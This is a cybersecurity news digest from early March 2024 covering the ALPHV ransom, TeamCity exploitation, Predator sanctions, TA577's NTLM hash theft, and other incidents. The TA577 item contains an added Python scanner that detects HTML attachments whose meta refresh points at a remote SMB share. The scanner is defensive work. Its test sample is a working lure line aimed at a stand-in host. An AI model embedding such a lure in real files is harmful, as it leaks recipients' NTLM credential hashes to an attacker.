By the CyberWire staff
At a glance.
- BlackCat/ALPHV ransomware gang receives $22 million payment.
- TeamCity flaw is undergoing widespread exploitation.
- US government sanctions Predator spyware operators.
- TA577 steals NTLM hashes.
- Evasive Panda leverages Monlam Prayer Festival to target Tibetans.
- South Korea's semiconductor industry targeted by DPRK.
- American Express discloses third-party data breach.
- Play ransomware group leaks Swiss government data.
BlackCat/ALPHV ransomware gang receives $22 million payment.
WIRED reports that BlackCat/ALPHV, the ransomware-as-a-service operation responsible for the attack against UnitedHealth Group's Change Healthcare platform, on March 1st received a payment of 350 bitcoins (approximately $22 million). The Register says UnitedHealth Group declined to say whether it paid the ransom. ALPHV said on its leak site last week that it had stolen six terabytes of sensitive data from Change Healthcare and its partners, but has since removed the post.
The Register also notes that ALPHV may be pulling an exit scam with the $22 million. Recorded Future researcher Dmitry Smilyanets says someone claiming to be the affiliate behind the Change Healthcare attack posted on an underground forum saying that ALPHV suspended their account and then "emptied the wallet and took all the money."
The Washington Post has published a summary of the impacts of the Change Healthcare attack. Molly Smith, group vice president for public policy at the American Hospital Association, stated, "Our assessment is that this is the most significant attack on the health-care system in U.S. history."
TeamCity flaw is undergoing widespread exploitation.
Rapid7 describes two authentication bypass vulnerabilities (CVE-2024-27198 and CVE-2024-27199) affecting the JetBrains TeamCity CI/CD server. JetBrains issued patches for the flaws on Sunday. Rapid7 notes that CVE-2024-27198 has been assigned a CVSS base score of 9.8 and can allow "for a complete compromise of a vulnerable TeamCity server by a remote unauthenticated attacker, including unauthenticated RCE." The Register reports that the vulnerabilities are already being exploited.
BleepingComputer reports that CVE-2024-27198 is being widely exploited to create administrator accounts on vulnerable hosts. "Exploitation appears to be massive, with hundreds of new users created on unpatched instances of TeamCity exposed on the public web," BleepingComputer says. The Register reports that at least one ransomware group has been observed targeting the vulnerability.
US government sanctions Predator spyware operators.
The US Treasury Department has sanctioned two individuals and five entities associated with Intellexa, a set of European companies that develops and sells the Predator spyware, which Treasury says has been "used to target Americans, including U.S. government officials, journalists, and policy experts." The Treasury Department said in a press release, "The Intellexa Consortium, which has a global customer base, has enabled the proliferation of commercial spyware and surveillance technologies around the world, including to authoritarian regimes. Furthermore, the Predator spyware has been deployed by foreign actors in an effort to covertly surveil U.S. government officials, journalists, and policy experts."
Researchers at Recorded Future's Insikt Group found that the operators of the Predator spyware have rebuilt their infrastructure and are targeting mobile devices in at least eleven countries. The spyware temporarily went quiet last year following a wide-ranging investigation into its operations coordinated by European Investigative Collaborations. Insikt Group states, "This infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. Notably, this is the first identification of Predator customers in Botswana and the Philippines. Despite being marketed for counterterrorism and law enforcement, Predator is often used against civil society, targeting journalists, politicians, and activists, with no specific victims or targets currently identified in this latest activity."
TA577 steals NTLM hashes.
Proofpoint says the cybercriminal group TA577 is using a new attack chain to steal NT LAN Manager (NTLM) authentication information: "Proofpoint identified at least two campaigns leveraging the same technique to steal NTLM hashes on 26 and 27 February 2024. Campaigns included tens of thousands of messages targeting hundreds of organizations globally. Messages appeared as replies to previous emails, known as thread hijacking, and contained zipped HTML attachments."
The HTML attachments are tailored to each victim and are designed to connect to attacker-controlled SMB servers: "When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor. Proofpoint has not observed malware delivery from these URLs; instead researchers assess with high confidence TA577’s objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used."
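The attack chain above (a meta refresh inside an HTML attachment pointing at a file-scheme URI on an external SMB host) lends itself to a simple mail-gateway check. The following is an added example, not Proofpoint's tooling: it parses an HTML attachment, extracts meta-refresh targets, and flags those that name a remote host rather than a local path. The sample HTML and the TEST-NET address 203.0.113.5 are constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional


def smb_host_of(uri: str) -> Optional[str]:
    """Return the remote host named by a file-scheme URI, or None for a local path.

    file://host/share/x.txt (two slashes) and file:////host/share/x.txt (UNC form,
    four or more slashes) name a remote host; file:///C:/x.txt (three slashes,
    empty authority) refers to the local machine and is not flagged.
    """
    if not uri.lower().startswith("file:"):
        return None
    rest = uri[5:]
    slashes = len(rest) - len(rest.lstrip("/"))
    body = rest[slashes:]
    if slashes < 2 or slashes == 3 or not body:
        return None
    host = body.split("/", 1)[0]
    return host or None


class MetaRefreshScanner(HTMLParser):
    """Collect the url= target of every <meta http-equiv="refresh"> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.refresh_targets: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "0; url=<target>"; the delay value is irrelevant here
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.IGNORECASE)
        if m:
            self.refresh_targets.append(m.group(1).strip())


def find_smb_refresh(html: str) -> List[dict]:
    """Return one finding per meta-refresh target that would reach a remote SMB share."""
    parser = MetaRefreshScanner()
    parser.feed(html)
    findings = []
    for target in parser.refresh_targets:
        host = smb_host_of(target)
        if host is None:
            continue
        findings.append({"target": target, "host": host,
                         "ends_with_txt": target.lower().endswith(".txt")})
    return findings


# Constructed sample mimicking the described attachment (not a real TA577 artifact)
SAMPLE_HTML = ('<html><head><meta http-equiv="refresh" '
               'content="0; url=file://203.0.113.5/share/invoice.txt"></head>'
               '<body>Loading...</body></html>')
```

A gateway rule would quarantine any zipped HTML attachment for which `find_smb_refresh` returns a non-empty list, and the `host` field feeds the block list for outbound TCP/445.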
Evasive Panda leverages Monlam Prayer Festival to target Tibetans.
ESET says the China-aligned threat actor Evasive Panda is targeting Tibetans with Trojanized versions of Tibetan language translation software. The threat actor also compromised a website belonging to the organizer of the annual Monlam Prayer Festival in order to launch watering-hole attacks. The researchers note, "The attackers aimed to deploy malicious downloaders for Windows and macOS to compromise website visitors with MgBot and a backdoor that, to the best of our knowledge, has not been publicly documented yet; we have named it Nightdoor."
South Korea's semiconductor industry targeted by DPRK.
South Korea's National Intelligence Service (NIS) says two of the country's semiconductor companies were breached by North Korean hackers in December 2023 and February 2024, the Record reports. The hackers stole "product design drawings and facility site photos." The NIS believes North Korea wants to build up its own domestic semiconductor industry to bypass international sanctions.
GhostSec cybercriminal group teams up with Stormous ransomware gang.
Cisco Talos warns that the GhostSec cybercriminal group is deploying a new Golang variant of its GhostLocker ransomware. The group has also worked with the Stormous ransomware gang to launch "several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia." The two groups have launched a joint ransomware-as-a-service operation called "STMX_GhostLocker."
American Express discloses third-party data breach.
American Express has disclosed a third-party data breach affecting a service provider used by its travel services division, BleepingComputer reports. The incident exposed credit card numbers, names, and card expiration dates. American Express said in a breach notification, "We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system. Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure."
Play ransomware group leaks Swiss government data.
Switzerland’s National Cyber Security Centre (NCSC) has disclosed that the Play ransomware gang leaked 65,000 government documents belonging to the Swiss government, some of which included classified information and sensitive personal data, the Record reports. The documents were stolen during an attack against IT provider and government contractor Xplain in May 2023. The NCSC says most of the government-related files belonged to the Federal Department of Justice and Police (FDJP), including the Federal Office of Justice, Federal Office of Police, State Secretariat for Migration, and the internal IT service centre ISC-FDJP.
Crime and punishment.
A Chinese national hired by Google in 2019 has been charged in the US District Court for the Northern District of California with "four counts of theft of trade secrets in connection with an alleged plan to steal from Google LLC (Google) proprietary information related to artificial intelligence (AI) technology," Infosecurity Magazine reports. The Justice Department alleges that Linwei Ding "transferred sensitive Google trade secrets and other confidential information from Google’s network to his personal account while secretly affiliating himself with PRC-based companies in the AI industry." Specifically, "the technology Ding allegedly stole involves the building blocks of Google’s advanced supercomputing data centers, which are designed to support machine learning workloads used to train and host large AI models."
Courts and torts.
A California court has ordered Israeli spyware vendor NSO Group to turn over the source code of its Pegasus tool as part of discovery in a lawsuit by WhatsApp, the Record reports. Judge Phyllis Hamilton stated, "The court rejects defendants’ argument that their production should be limited to the installation layer of the alleged spyware, and instead concludes that defendants must produce information concerning the full functionality of the relevant spyware. The complaint contains numerous instances alleging not only that spyware was installed on users’ devices, but also that information was accessed and/or extracted from those devices."